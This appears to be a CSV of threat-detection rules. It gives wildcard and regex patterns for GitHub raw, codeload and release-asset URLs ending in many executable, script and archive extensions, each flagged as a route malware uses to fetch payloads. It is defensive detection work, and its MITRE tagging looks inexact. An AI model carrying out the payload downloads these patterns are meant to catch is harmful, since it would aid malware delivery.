"*/github.com/*/raw/main/*.dos*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.dos.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.exe*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.go*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.go.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.gz*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.gz.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.hta*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.iso*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.iso.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.jar*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.jar.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.js*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.js.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.lnk*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.lnk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.log*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.log.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.mac*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.mac.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.mam*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.mam.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.msi*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.msp*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.msp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.nexe*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.nexe.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.nim*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.nim.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.otm*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.otm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.out*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.out.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.ova*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.ova.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.pem*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pem.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.pfx*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pfx.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.pl*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pl.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.plx*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.plx.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.pm*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.ppk*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.ppk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.ps1*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.psm1*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.psm1.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.pub*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pub.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.py*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.py.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.pyc*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pyc.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.pyo*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.pyo.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.rar*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.rar.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.raw*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.raw.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.reg*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.reg.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.rgs*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.rgs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.RGS*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.RGS.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.run*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.run.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.scpt*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.scpt.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.script*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.script.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.sct*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.sct.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.sh*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.sh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.ssh*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.ssh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.sys*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.sys.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.teamserver*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.teamserver.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.temp*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.temp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.tgz*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.tgz.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.tmp*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.tmp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.vb*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.vb.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.vbs*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.vbs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.vbscript*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.vbscript.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.ws*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.ws.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.wsf*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.wsf.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.wsh*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.wsh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.X86*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.X86.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.X86_64*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.X86_64.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.xlam*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.xlam.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.xlm*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.xlm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.xlsm*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.xlsm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.zip*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*codeload.github.com/*",".{0,1000}codeload\.github\.com\/.{0,1000}","greyware_tool_keyword","github","Github executables download initiated - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*objects.githubusercontent.com/github-production-release-asset-*",".{0,1000}objects\.githubusercontent\.com\/github\-production\-release\-asset\-.{0,1000}","greyware_tool_keyword","github","Github executables download initiated - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.7z*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.7z.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.apk*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.apk.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.app*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.app.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.as*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.as.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.asc*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.asc.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.asp*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.asp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.bash*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.bash.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.bat*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.beacon*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.beacon.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.bin*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.bin.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.bpl*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.bpl.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.c",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.c","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.cer*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.cer.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.cmd*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.com*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.com.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.cpp*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.cpp.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.crt*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.crt.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.cs*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.cs.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.csh*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.csh.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.dat*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.dat.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.dll*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.dll.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.docm*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.docm.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.dos*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.dos.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.exe*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.go*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.go.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*raw.githubusercontent.com*.gz*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.gz.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
